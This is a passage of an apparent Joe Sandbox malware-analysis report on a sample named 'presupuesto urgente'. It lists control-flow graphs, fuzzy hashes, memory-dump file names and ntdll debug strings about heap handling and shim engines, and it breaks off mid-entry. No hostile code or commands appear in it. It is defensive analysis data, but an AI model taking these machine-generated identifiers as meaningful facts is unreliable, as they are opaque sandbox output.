                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: de4275324e7b7af169fc74510b540f3f7effc05f8ecb51651c370032e833fb53
                                                                                                                                                      • Instruction ID: 2800e0ed8f566d59eebbcae316cfbf026fbf2867015daf55e2f178145241f775
                                                                                                                                                      • Opcode Fuzzy Hash: de4275324e7b7af169fc74510b540f3f7effc05f8ecb51651c370032e833fb53
                                                                                                                                                      • Instruction Fuzzy Hash: 5590022130144882D54063585914B0F414587E1203F91CC1EA4146914CC925885D6B21
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                      • Instruction ID: 0ead659096ee62f44d26313d2cce3b7924b51afffbd7415f0dc9bfcd435db340
                                                                                                                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 881 3360a1f0-3360a269 call 33542330 * 2 RtlDebugPrintTimes 887 3360a41f-3360a444 call 335424d0 * 2 call 33574b50 881->887 888 3360a26f-3360a27a 881->888 890 3360a2a4 888->890 891 3360a27c-3360a289 888->891 895 3360a2a8-3360a2b4 890->895 893 3360a28b-3360a28d 891->893 894 3360a28f-3360a295 891->894 893->894 897 3360a373-3360a375 894->897 898 3360a29b-3360a2a2 894->898 899 3360a2c1-3360a2c3 895->899 901 3360a39f-3360a3a1 897->901 898->895 902 3360a2c5-3360a2c7 899->902 903 3360a2b6-3360a2bc 899->903 904 3360a2d5-3360a2fd RtlDebugPrintTimes 901->904 905 3360a3a7-3360a3b4 901->905 902->901 907 3360a2cc-3360a2d0 903->907 908 3360a2be 903->908 904->887 919 3360a303-3360a320 RtlDebugPrintTimes 904->919 910 3360a3b6-3360a3c3 905->910 911 3360a3da-3360a3e6 905->911 909 3360a3ec-3360a3ee 907->909 908->899 909->901 914 3360a3c5-3360a3c9 910->914 915 3360a3cb-3360a3d1 910->915 916 3360a3fb-3360a3fd 911->916 914->915 920 3360a3d7 915->920 921 3360a4eb-3360a4ed 915->921 917 3360a3f0-3360a3f6 916->917 918 3360a3ff-3360a401 916->918 923 3360a447-3360a44b 917->923 924 3360a3f8 917->924 922 3360a403-3360a409 918->922 919->887 929 3360a326-3360a34c RtlDebugPrintTimes 919->929 920->911 921->922 925 3360a450-3360a474 RtlDebugPrintTimes 922->925 926 3360a40b-3360a41d RtlDebugPrintTimes 922->926 928 3360a51f-3360a521 923->928 924->916 925->887 932 3360a476-3360a493 RtlDebugPrintTimes 925->932 926->887 929->887 934 3360a352-3360a354 929->934 932->887 939 3360a495-3360a4c4 RtlDebugPrintTimes 932->939 936 3360a356-3360a363 934->936 937 3360a377-3360a38a 934->937 940 3360a365-3360a369 936->940 941 3360a36b-3360a371 936->941 938 3360a397-3360a399 937->938 942 3360a39b-3360a39d 938->942 943 3360a38c-3360a392 938->943 939->887 947 3360a4ca-3360a4cc 939->947 940->941 941->897 941->937 942->901 944 3360a394 943->944 945 3360a3e8-3360a3ea 943->945 944->938 945->909 948 3360a4f2-3360a505 947->948 949 3360a4ce-3360a4db 947->949 952 3360a512-3360a514 948->952 950 3360a4e3-3360a4e9 949->950 951 3360a4dd-3360a4e1 949->951 950->921 950->948 951->950 953 3360a516 952->953 954 3360a507-3360a50d 952->954 953->918 955 3360a51b-3360a51d 954->955 956 3360a50f 954->956 955->928 956->952
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      • Opcode ID: d69521053f589e74b4828c452f373fd74be2281f3dd39739cc275fde9af90aba
                                                                                                                                                      • Instruction ID: b8d579f0b44bfad99dbec4ee0cf1a529f2a45747f2eb00ad8415dbfd299f3fa1
                                                                                                                                                      • Opcode Fuzzy Hash: d69521053f589e74b4828c452f373fd74be2281f3dd39739cc275fde9af90aba
                                                                                                                                                      • Instruction Fuzzy Hash: E7A19A75A183118FD708CE28C895A2ABBE5FF88790F09452DE985DB310EB70EC49CF91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 957 33567550-33567571 958 33567573-3356758f call 3353e580 957->958 959 335675ab-335675b9 call 33574b50 957->959 964 33567595-335675a2 958->964 965 335a4443 958->965 966 335675a4 964->966 967 335675ba-335675c9 call 33567738 964->967 969 335a444a-335a4450 965->969 966->959 973 33567621-3356762a 967->973 974 335675cb-335675e1 call 335676ed 967->974 971 335675e7-335675f0 call 33567648 969->971 972 335a4456-335a44c3 call 335bef10 call 33578f40 RtlDebugPrintTimes BaseQueryModuleData 969->972 971->973 984 335675f2 971->984 972->971 989 335a44c9-335a44d1 972->989 977 335675f8-33567601 973->977 974->969 974->971 981 33567603-33567612 call 3356763b 977->981 982 3356762c-3356762e 977->982 988 33567614-33567616 981->988 982->988 984->977 991 33567630-33567639 988->991 992 33567618-3356761a 988->992 989->971 993 335a44d7-335a44de 989->993 991->992 992->966 994 3356761c 992->994 993->971 995 335a44e4-335a44ef 993->995 996 335a45c9-335a45db call 33572b70 994->996 997 335a45c4 call 33574c68 995->997 998 335a44f5-335a452e call 335bef10 call 3357a9c0 995->998 996->966 997->996 1006 335a4530-335a4541 call 335bef10 998->1006 1007 335a4546-335a4576 call 335bef10 998->1007 1006->973 1007->971 1012 335a457c-335a458a call 3357a690 1007->1012 1015 335a458c-335a458e 1012->1015 1016 335a4591-335a45ae call 335bef10 call 335acc1e 1012->1016 1015->1016 1016->971 1021 335a45b4-335a45bd 1016->1021 1021->1012 1022 335a45bf 1021->1022 1022->971
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 335A4530
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 335A4460
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 335A4507
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 335A4592
                                                                                                                                                      • Execute=1, xrefs: 335A451E
                                                                                                                                                      • ExecuteOptions, xrefs: 335A44AB
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 335A454D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 2cb3e1bb0d8d6496d5501ce1248cea0efafde1fd05cc52c8d29693f38fa89536
                                                                                                                                                      • Instruction ID: be389845c387cbe8792545d50126a3ddfd6ba86154a264d916e0e6c624868331
                                                                                                                                                      • Opcode Fuzzy Hash: 2cb3e1bb0d8d6496d5501ce1248cea0efafde1fd05cc52c8d29693f38fa89536
                                                                                                                                                      • Instruction Fuzzy Hash: A6511771E00319BBEF119AA8FC95FAD73B8EF58348F4404E9E505A7681EB709A41CF91

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1247 3354a170-3354a18f 1248 3354a195-3354a1b1 1247->1248 1249 3354a4ad-3354a4b4 1247->1249 1251 3354a1b7-3354a1c0 1248->1251 1252 335977f3-335977f8 1248->1252 1249->1248 1250 3354a4ba-335977c8 1249->1250 1250->1248 1255 335977ce-335977d3 1250->1255 1251->1252 1254 3354a1c6-3354a1cc 1251->1254 1256 3354a1d2-3354a1d4 1254->1256 1257 3354a5da-3354a5dc 1254->1257 1258 3354a393-3354a399 1255->1258 1256->1252 1259 3354a1da-3354a1dd 1256->1259 1257->1259 1260 3354a5e2 1257->1260 1259->1252 1261 3354a1e3-3354a1e6 1259->1261 1260->1261 1262 3354a1e8-3354a1f1 1261->1262 1263 3354a1fa-3354a1fd 1261->1263 1264 335977d8-335977e2 1262->1264 1265 3354a1f7 1262->1265 1266 3354a5e7-3354a5f0 1263->1266 1267 3354a203-3354a24b 1263->1267 1268 335977e7-335977f0 call 335bef10 1264->1268 1265->1263 1266->1267 1270 3354a5f6-3359780c 1266->1270 1269 3354a250-3354a255 1267->1269 1268->1252 1273 3354a39c-3354a39f 1269->1273 1274 3354a25b-3354a263 1269->1274 1270->1268 1277 3354a26f-3354a27d 1273->1277 1278 3354a3a5-3354a3a8 1273->1278 1276 3354a265-3354a269 1274->1276 1274->1277 1276->1277 1279 3354a4bf-3354a4c8 1276->1279 1280 3354a283-3354a288 1277->1280 1281 3354a3ae-3354a3be 1277->1281 1278->1281 1282 33597823-33597826 1278->1282 1284 3354a4e0-3354a4e3 1279->1284 1285 3354a4ca-3354a4cc 1279->1285 1286 3354a28c-3354a28e 1280->1286 1281->1282 1283 3354a3c4-3354a3cd 1281->1283 1282->1286 1287 3359782c-33597831 1282->1287 1283->1286 1289 3359780e 1284->1289 1290 3354a4e9-3354a4ec 1284->1290 1285->1277 1288 3354a4d2-3354a4db 1285->1288 1291 3354a294-3354a2ac call 3354a600 1286->1291 1292 33597833 1286->1292 1293 33597838 1287->1293 1288->1286 1295 33597819 1289->1295 1290->1295 1296 3354a4f2-3354a4f5 1290->1296 1300 3354a3d2-3354a3d9 1291->1300 1301 3354a2b2-3354a2da 1291->1301 1292->1293 1294 3359783a-3359783c 1293->1294 1294->1258 1298 33597842 1294->1298 1295->1282 1296->1285 1302 3354a2dc-3354a2de 1300->1302 1303 3354a3df-3354a3e2 1300->1303 1301->1302 1302->1294 1305 3354a2e4-3354a2eb 1302->1305 1303->1302 1304 3354a3e8-3354a3f3 1303->1304 1304->1269 1306 335978ed 1305->1306 1307 3354a2f1-3354a2f4 1305->1307 1309 335978f1-33597909 call 335bef10 1306->1309 1308 3354a300-3354a30a 1307->1308 1308->1309 1310 3354a310-3354a32c call 3354a760 1308->1310 1309->1258 1315 3354a4f7-3354a500 1310->1315 1316 3354a332-3354a337 1310->1316 1318 3354a521-3354a523 1315->1318 1319 3354a502-3354a50b 1315->1319 1316->1258 1317 3354a339-3354a35d 1316->1317 1320 3354a360-3354a363 1317->1320 1322 3354a525-3354a543 call 33534428 1318->1322 1323 3354a549-3354a551 1318->1323 1319->1318 1321 3354a50d-3354a511 1319->1321 1325 3354a3f8-3354a3fc 1320->1325 1326 3354a369-3354a36c 1320->1326 1327 3354a517-3354a51b 1321->1327 1328 3354a5a1-3354a5cb RtlDebugPrintTimes 1321->1328 1322->1258 1322->1323 1330 3354a402-3354a405 1325->1330 1331 33597847-3359784f 1325->1331 1332 3354a372-3354a374 1326->1332 1333 335978e3 1326->1333 1327->1318 1327->1328 1328->1318 1346 3354a5d1-3354a5d5 1328->1346 1334 3354a554-3354a56a 1330->1334 1336 3354a40b-3354a40e 1330->1336 1331->1334 1335 33597855-33597859 1331->1335 1337 3354a440-3354a459 call 3354a600 1332->1337 1338 3354a37a-3354a381 1332->1338 1333->1306 1340 3354a414-3354a42c 1334->1340 1341 3354a570-3354a579 1334->1341 1335->1334 1342 3359785f-33597868 1335->1342 1336->1326 1336->1340 1356 3354a57e-3354a585 1337->1356 1357 3354a45f-3354a487 1337->1357 1344 3354a387-3354a38c 1338->1344 1345 3354a49b-3354a4a2 1338->1345 1340->1326 1350 3354a432-3354a43b 1340->1350 1341->1332 1348 3359786a-3359786d 1342->1348 1349 33597892-33597894 1342->1349 1344->1258 1352 3354a38e 1344->1352 1345->1308 1347 3354a4a8 1345->1347 1346->1318 1347->1306 1353 3359787b-3359787e 1348->1353 1354 3359786f-33597879 1348->1354 1349->1334 1355 3359789a-335978a3 1349->1355 1350->1332 1352->1258 1361 3359788b 1353->1361 1362 33597880-33597889 1353->1362 1360 3359788e 1354->1360 1355->1332 1358 3354a489-3354a48b 1356->1358 1359 3354a58b-3354a58e 1356->1359 1357->1358 1358->1344 1364 3354a491-3354a493 1358->1364 1359->1358 1363 3354a594-3354a59c 1359->1363 1360->1349 1361->1360 1362->1355 1363->1320 1365 335978a8-335978b1 1364->1365 1366 3354a499 1364->1366 1365->1366 1367 335978b7-335978bd 1365->1367 1366->1345 1367->1366 1368 335978c3-335978cb 1367->1368 1368->1366 1369 335978d1-335978dc 1368->1369 1369->1368 1370 335978de 1369->1370 1370->1366
                                                                                                                                                      Strings
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 335978F3
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 335977E2
                                                                                                                                                      • Actx , xrefs: 33597819, 33597880
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33597807
                                                                                                                                                      • SsHd, xrefs: 3354A304
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 335977DD, 33597802
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      • Opcode ID: eaa608305c15ab8b67df66f88ad97aa5f3f25503f3872f86d543e4d5470a03be
                                                                                                                                                      • Instruction ID: cfc2e53b546f1286be6ed53e0e7e31bafd77cae5f6bb6968ef3e01a902964b9a
                                                                                                                                                      • Opcode Fuzzy Hash: eaa608305c15ab8b67df66f88ad97aa5f3f25503f3872f86d543e4d5470a03be
                                                                                                                                                      • Instruction Fuzzy Hash: DBE1E2746083028FE759CE24E88579A77E5BB84364F584A2EF8A5CB290E731D845CB91
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33599153
                                                                                                                                                      • GsHd, xrefs: 3354D794
                                                                                                                                                      • Actx , xrefs: 33599315
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 33599372
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 33599178
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3359914E, 33599173
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      • Opcode ID: 251f924f8a885da7d2dcc620aa1fe9d4320d61f1d8e4f34f20ab5d3019bfcf8e
                                                                                                                                                      • Instruction ID: ed4f22d1a8e8bd7f1b78156c57769245593014015b8a725fb1c84873ad427b67
                                                                                                                                                      • Opcode Fuzzy Hash: 251f924f8a885da7d2dcc620aa1fe9d4320d61f1d8e4f34f20ab5d3019bfcf8e
                                                                                                                                                      • Instruction Fuzzy Hash: 34E1A074A08342DFE714CF14E880B5AB7F4BF88358F494A6DE895CB292D771E944CB92
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 3352651C
                                                                                                                                                        • Part of subcall function 33526565: RtlDebugPrintTimes.NTDLL ref: 33526614
                                                                                                                                                        • Part of subcall function 33526565: RtlDebugPrintTimes.NTDLL ref: 3352665F
                                                                                                                                                      Strings
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3358977C
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 33589790
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 335897B9
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 335897A0, 335897C9
                                                                                                                                                      • apphelp.dll, xrefs: 33526446
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 33589783, 33589796, 335897BF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      • Opcode ID: 692a9d7e0ec442409490081eb149fcfa0b7c75c7be50af6d3a0efdd3847b64c3
                                                                                                                                                      • Instruction ID: a57ea8e81e22b9717e16959d4925abeb8fded316024a2314197439a93b9ac37d
                                                                                                                                                      • Opcode Fuzzy Hash: 692a9d7e0ec442409490081eb149fcfa0b7c75c7be50af6d3a0efdd3847b64c3
                                                                                                                                                      • Instruction Fuzzy Hash: 1351A071A09300AFE710DF24E891F5B7BE8EBC4644F810919F995EB5A1DB70D905CB92
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      • Opcode ID: 5a76b7da184e976400f2481616a0e5cd17a76442442b25bb0476e901381c2944
                                                                                                                                                      • Instruction ID: be048afe63cbfa6dcd3a6ffc29eb524cd10f1bd40463858d46dbcd0c86f952eb
                                                                                                                                                      • Opcode Fuzzy Hash: 5a76b7da184e976400f2481616a0e5cd17a76442442b25bb0476e901381c2944
                                                                                                                                                      • Instruction Fuzzy Hash: 56417CB5E01209AFDB02DF99D884ADEBBF5BF88754F144169EC00E7340D7719A11EB90
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      • Opcode ID: e69b4968d34b1a3b376affc7dbdfc5cdda2185c96a16850021a19f03aa37db4b
                                                                                                                                                      • Instruction ID: d511114a4f2859f96d1009ee435c88ae8aa5490dd381b3d57682ccfe68b4ee56
                                                                                                                                                      • Opcode Fuzzy Hash: e69b4968d34b1a3b376affc7dbdfc5cdda2185c96a16850021a19f03aa37db4b
                                                                                                                                                      • Instruction Fuzzy Hash: 0B71DE75901644EFDB02DF68E4606ADFBF2FF89700F48825AE885EB691CB359981CB50
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 3358984A, 3358988B
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33589843
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 33589854, 33589895
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 33589885
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      • Opcode ID: 8e1ff90398c29785ce423a271e3d8db777609dd6e834f23f85c02cdc3c46ad07
                                                                                                                                                      • Instruction ID: 5695a2e262a16eb5a8775b09e4d9473aceb8c95d76df53881ca471143f73a974
                                                                                                                                                      • Opcode Fuzzy Hash: 8e1ff90398c29785ce423a271e3d8db777609dd6e834f23f85c02cdc3c46ad07
                                                                                                                                                      • Instruction Fuzzy Hash: B6510635F01348AFDB04DBA8E858E9D7BF5AB90744F450525E451FF299DBB0AC41CB84
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      • Opcode ID: 77129b16d894feadfe90fc8a1efaf57b1d279d5fdee98e0d0f822b0178a77d19
                                                                                                                                                      • Instruction ID: 00a6cc24dc1d8779a8f611ec5d837745ec9ee2fdbba637fd677173fc30535e3b
                                                                                                                                                      • Opcode Fuzzy Hash: 77129b16d894feadfe90fc8a1efaf57b1d279d5fdee98e0d0f822b0178a77d19
                                                                                                                                                      • Instruction Fuzzy Hash: 18412775A04740DFF701DF28E544B8AB7F4EF80355F188AA9F856D7681CB78A980CB91
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      • Opcode ID: ce18d2f265c92cf9ca8107beaaa70c23cd4b9f68cc7bc003218204b58b75be59
                                                                                                                                                      • Instruction ID: 85fad9c2e6a9832a4040363e39b2e268ab0306ccc94ed026ad48ae185e969e69
                                                                                                                                                      • Opcode Fuzzy Hash: ce18d2f265c92cf9ca8107beaaa70c23cd4b9f68cc7bc003218204b58b75be59
                                                                                                                                                      • Instruction Fuzzy Hash: 25314736511B84EFF712DB24E408B8977F8EF01760F084A85F452D7A91CB66E980CF51
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
